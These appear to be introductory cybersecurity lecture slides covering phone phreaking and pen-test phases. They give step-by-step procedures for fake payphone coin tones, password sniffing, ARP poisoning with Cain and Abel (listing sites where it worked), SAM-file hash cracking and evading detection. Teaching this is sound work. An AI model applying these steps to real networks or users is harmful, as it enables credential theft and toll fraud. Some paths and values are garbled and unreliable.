Hacking: What is it and how is it done?Introduction to Cybersecurity Slides by Raymond Borges
OutlineBackgroundHacking 101 The penetration test Reconnaissance Enumeration Gaining access Privilege escalation Maintaining access StealthConclusion
BackgroundPhone freaks were some of the first hackers• Phreaking- activity of a culture of people who study, experiment with, or explore telecom• Blue box- tone generator capable of producing frequencies to hack phone trunks
BackgroundBelow is the blue box built by Steve Wozniak, ondisplay at the Computer History Museum andalso the Captain Crunch whistle
The Blue Box How did the Blue Box work?1. User places a long distance telephone call2. When the call rings he sends the 2600Hz tone3. Basically, this tone is signaling you hung up4. Line makes a "Ka-Cheep" noise, followed bysilence, it is now waiting for routing digits5. Dial a "Key Pulse" followed by telephone #6. You just made a free call
Phreaking boxes!!!• Blue- can make calls initiated by generating 2600Hz tone followed by• Red- generates tones to simulate inserting coins in pay phones• Black- small electronic circuit added to a telephone which provided the caller with a free call.
Make your own Red Box1. Download any free tone generator e.g. NCH Tone Generator2. Create at least one ₵ ₵ or ₵ tone 5, 10 25 sequence by combining 1.7KHz and 2.2KHzi.e. ₵5=One 66 ms tone3. Save and playback toneto payphone microphone4. Free calls!
Hacking 101 Hacking - is the investigation and exploitation of system vulnerabilities.Hacking expertise varies, some categories are:• Newbies- Basic concepts but little practice• Cyberpunks – Know the tools of the trade• Coders- Write the tools to automate hacks• Cyber terrorists-Threats to national security
Hacker Hats• White hats- Security professionals (defense)• Black hats- Crackers, bad guys• Grey hats… In between
The penetration testCommon steps in a pen test or hacking1. Reconnaissance2. Scanning and enumeration3. Gaining access4. Escalation of privileges5. Maintaining access6. Covering tracks
ScanningThe steps for a scanning methodology are:1. Identify live systems2. Discover open ports3. Identify the OS and services4. Scan for vulnerabilities
Gaining Access• Once known vulnerabilities are enumerated• Learn the extent of usefulness of exploitationThe keystone of security is authentication andthe most used method is the password
Password AttacksPassive online attack e.g. a packet sniffercapturing a password in plaintext in networktrafficActive online attack e.g. password guessingOffline password cracking e.g. stealing thepassword hashes and offline crackingKeylogging e.g. hardware or softwarekeystroke logger
Passive online attack0.http://www.httprecipes.com/1/2/forms.php1.Run Wireshark2.Filter http3.Find post method4.Follow TCP stream5. You have username and password in the clearif server isn’t using https SSL or other encryption
Replay and Man-in-the-middle• When passwords can’t be caught in plaintext Man-in-the-middle• ARP poisoning• Session hijacking Replay attack
Cain and Abel (ARP poisoning)1. Install Cain and Abel2. Connect to a network3. Select sniffer tab4. Start sniffer and select network interface5. Select hosts on bottom and press then ok6. Select bottom APR tab and click top window7. Press and select target IP then hit Ok8. Hit then select passwords tab, (http)
Cain and Abel (ARP poisoning) Man-in-the-middle (Worked in Firefox7)• http://www.voddler.com/ (clueless of attack)• http://www.cnet.com/ (clueless of attack)• https://www.fxhome.com/ (invalid certificate)• https://www.yahoo.com/ (invalid certificate)• https://www.amazon.com/ (invalid certificate)(Invalid certificate, worked in Internet Explorer 9 if continues)• https://accounts.google.com (Gmail) (sometimes, *cookies)• https://login.live.com (Hotmail)
Cain and Abel (ARP poisoning)Secured (Internet Explorer and Firefox)• http://www.facebook.com• https://www.facebook.com• https://www.paypal.com/Firefox version 7Secured, detects invalid certificate w/no continue• https://www.paypal.com
Active online attack (Guessing)1. Your partner, child or pet’s name, possibly followed by a 0 or 1 (because they’re always making you use a number, aren’t they?)2. The last 4 digits of your social security number.3. 123 or 1234 or 123456.4. “password”5. Your city, or college, football team name.6. Date of birth – yours, your partner’s or your child’s.7. “god”8. “letmein” This list covered about 20% of9. “money” passwords as of March10. “love” 31, 2010, according to Lifehacker.com
Offline password cracking Passwords on Windows systems found in SAMC:windowssystem32configC:windowsrepair copy sam and system fileshttp://www.youtube.com/watch?v=SDsJbgl2J8E Passwords in Linux are found in shadow file /etc/shadow Crack password hash files (Cain and Abel)
Offline password cracking1. Copy sam and system files2. Run Cain and Abel3. Select cracker tab4. Select LM and NTLM5. Select plus sign6. Add sam and system files7. Copy key, exit and paste8. Right click and crack with LM up to Vista
KeyloggersRecord every keystroke the user makes Software keyloggers can send passwords to remote computers(low risk for hacker) Hardware keyloggers may be small dongles placed on the back of a desktop(high risk for hacker)
Other forms of Gaining Access Trojans and backdoors• A Trojan can accomplish any number of things from sending email, keylogging and stealing data to turning your computer into a zombie.• Usually it provides an entrance and a form of maintaining access by implementing a backdoor.
Privilege Escalation Once inside a hacker can seek better ways of cracking the root or administrator password• A good tool that is somewhat famous in the hacker community is Metasploit.• Metasploit is a semi-automated tool for find vulnerabilities that may lead to role elevation.
Stealth Some tactics are:1. Use passive attacks2. Use proxies3. Use the Tor anonymity network if possible4. Hack from open or public access points5. Use attack diversions when performing the real active attacks that could expose you
ConclusionNothing is secureSecurity - matter of cost of attack vs info valueCost can be calculated in $dollars and effortActive attack = High RiskPassive attack = Low Risk
References• Matt Walker, CEH ALL-IN-ONE, 2011• Williams Stalling, Lawrie Brown, Computer Security, 2008• Jon Erickson, Hacking The Art of Exploitation, 2008• http://www.nch.com.au/tonegen/faq.html• http://sectools.org/index.html• http://www.lifehacker.com.au/2010/03/how- i%E2%80%99d-hack-your-weak-passwords/• http://www.youtube.com/watch?v=7ezGTP99xSw• http://www.wireshark.org/docs/wsug_html_chunked/ChW orkBuildDisplayFilterSection.html• http://www.youtube.com/watch?v=C_trnrkkPUs&feature=r elated